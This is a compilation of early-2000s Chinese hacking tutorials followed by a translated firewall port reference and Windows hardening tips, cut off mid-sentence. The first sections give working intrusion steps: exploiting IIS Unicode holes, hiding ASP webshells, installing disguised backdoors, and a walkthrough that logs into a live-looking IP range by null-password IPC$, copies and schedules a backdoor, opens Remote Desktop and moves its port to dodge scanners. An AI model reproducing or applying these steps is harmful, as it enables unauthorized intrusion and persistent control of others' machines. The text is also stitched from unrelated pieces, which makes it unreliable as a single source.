总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)
想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。
那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!
----------------------------------------
这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。
今天说点什么呢?没有主题,乱谈一通吧!
首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。
我来说说我自己觉得最有用的几个项目:
1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。
remote execute-x 这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)
remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!
remote ftp sam -x 拿sam的,还是用最好的lc3来解吧!
frontpage extended 这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilege hole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点,http://ip就可以了!(http://不要忘)
此外还有一点变通,大家肯定读的懂的。
2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。
3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!
总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的。
然后我想说说一些黑站的经验。
☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。
上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!
推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)
最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)
☆我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poison box,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!
我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?
☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:
net start termservice 启动win2k的终端控制
net start workstation 打开net use 功能
net start lanmanserver 打开ipc
net start eventlog 启动日志(你不会那么傻吧!stop)
net start schedule 打开计划(at)
net start server 共享
还有很多,net命令里去找吧!
☆打开telnet
1,远程去运行ntlm.exe,流光里有
2,net stop telnet
3, net start telnet
☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!
至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!
☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。
具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。
做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!
要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc.126.com国内最最好的的代理站点,怕死的朋友千万不要错过。
最后说说一些对于菜鸟同志的建议:
不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的……
不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。
不要和被你黑的网管过多接触,前车之鉴哦。
对于一台好机器要做好后门,不要轻易失去它。
想好好学黑客的话,就常去各大论坛转转,仔细读教程,忘记聊天室和网络游戏吧!
实践是最好的教程,再次重申!
应该多学计算机的其他方面的知识,任何知识在一定场合都是有用的。
编程技术……好像太难了,不过再难也要学。
想不出来了………………
好了,我们的菜鸟操终于结束了,我这个大菜鸟也可以退休了,拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站,不知道大家是否成功了,不管这么样,我们都该不断的努力学习,不是吗?
工具:流光4.7 (http://www.heibai.net/download/show.php?id=2277&down=1)
Wollf v1.6 (http://www.heibai.net/download/show.php?id=2996&down=1)
HBULOT (http://www.heibai.net/download/show.php?id=2951&down=1)
本机平台:2000/NT
目标平台:2000/NT
以上工具在黑白均能找到,具体使用方法会在文章中会介绍。
首先打开流光(如果你连流光都没听过过的话,我想你没必要看这篇文章),Ctrl+A,填上一段ip,选择IPC扫
描。过一会有结果了:
218.22.155.* (SERVER)
--------------------------------------------------------------------------------
IPC扫描
获得共享列表
g f e h I
获得用户列表
029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser
猜解成功用户帐号 Administrator (Admin):(NULL)
随便找了一台做实验,先ipc$连上再说。
==========================================================================================
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------连接成功!
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内
容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
2分钟后......
==========================================================================================
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。
==========================================================================================
[server@D:\WINNT\system32]#dos
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。
==========================================================================================
D:\WINNT\system32>cd..
cd..
D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615
D:\WINNT 的目录
2002-11-27 03:07 Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节
D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。
==========================================================================================
D:\WINNT>exit
exit
Command "DOS" succeed.
[server@D:\WINNT\system32]#reboot
Command "REBOOT" succeed.
[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下
。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装
终端服务。
到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!
我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对
目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口
来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\
表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。
3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。
0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。
7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。
常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)
另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。
Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。
11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似
再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11
19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)
还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。
UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。
23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。
25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。
53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。
需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。
67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。
79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。
98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)
109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。
110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。
111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。
记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。
119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。
135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?
这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。
137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节
139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。
143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。
这一端口还被用于IMAP2,但并不流行。
已有一些报道发现有些0到143端口的攻击源于脚本。
161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。
SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。
162 SNMP trap 可能是由于错误配置
177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。
513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。
553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。
600 Pcserver backdoor 请查看1524端口
一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.
635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。
1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。
?ersion 0.4.1, June 20, 2000
http://www.robertgraham.com/pubs/firewall-seen.html
Copyright 1998-2000 by Robert Graham (mailto:firewall-seen1@robertgraham.com.
All rights reserved. This document may only be reproduced (whole or
in part) for non-commercial purposes. All reproductions must
contain this copyright notice and must not be altered, except by
permission of the author.
1025 参见1024
1026 参见1024
1080 SOCKS
这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。
1114 SQL
系统本身很少扫描这个端口,但常常是sscan脚本的一部分。
1243 Sub-7木马(TCP)
参见Subseven部分。
1524 ingreslock后门
许多攻击脚本将安装一个后门Sh*ll 于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd, ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。
2049 NFS
NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS 杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。
3128 squid
这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。
5632 pcAnywere
你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。
6776 Sub-7 artifact
这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)
6970 RealAudio
RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。
13223 PowWow
PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。
17027 Conducent
这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:
机器会不断试图解析DNS名─ads.conducent.com,即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)
27374 Sub-7木马(TCP)
参见Subseven部分。
30100 NetSphere木马(TCP)
通常这一端口的扫描是为了寻找中了NetSphere木马。
31337 Back Orifice “elite”
Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。
31789 Hack-a-tack
这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)
32770~32900 RPC服务
Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。
33434~33600 traceroute
如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。
41508 Inoculan
早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见
http://www.circlemud.org/~jelson/software/udpsend.html
http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
(二) 下面的这些源端口意味着什么?
端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。参见1.9。
常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。
Server Client 服务 描述
1-5/tcp 动态 FTP 1-5端口意味着sscan脚本
20/tcp 动态 FTP FTP服务器传送文件的端口
53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。
123 动态 S/NTP 简单网络时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。
27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。
61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP Masquerade)
在这里我作为我写的安全知识基础二供大家参考:
每一项服务都对应相应的端口,比如众如周知的WWW服务的端口是80,smtp是25,ftp是21,win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要,关掉端口也就是关闭无用的服务。
“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口:关闭Simple TCP/IP Service,支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口:关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service",通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。
4、关掉21端口:关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务,此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享,比如ipc$、c$、admin$等等,此服务关闭不影响您的共他操作。
7、还有一个就是139端口,139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放既认为是NT机,现在好了。
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
对于个人用户来说,可以在各项服务属性设置中设为“禁用”,以免下次重启服务也重新启动,端口也开放了。
尽管资深的黑客不屑于使用木马,但在对以往网络安全事件的分析统计里,我们发现,有相当部分的网络入侵是通过木马来进行的,包括去年微软被黑一案,据称该黑客是通过一种普通的蠕虫木马侵入微软的系统的,并且窃取了微软部分产品的源码。
木马的危害性在于它对电脑系统强大的控制和破坏能力,窃取密码、控制系统操作、进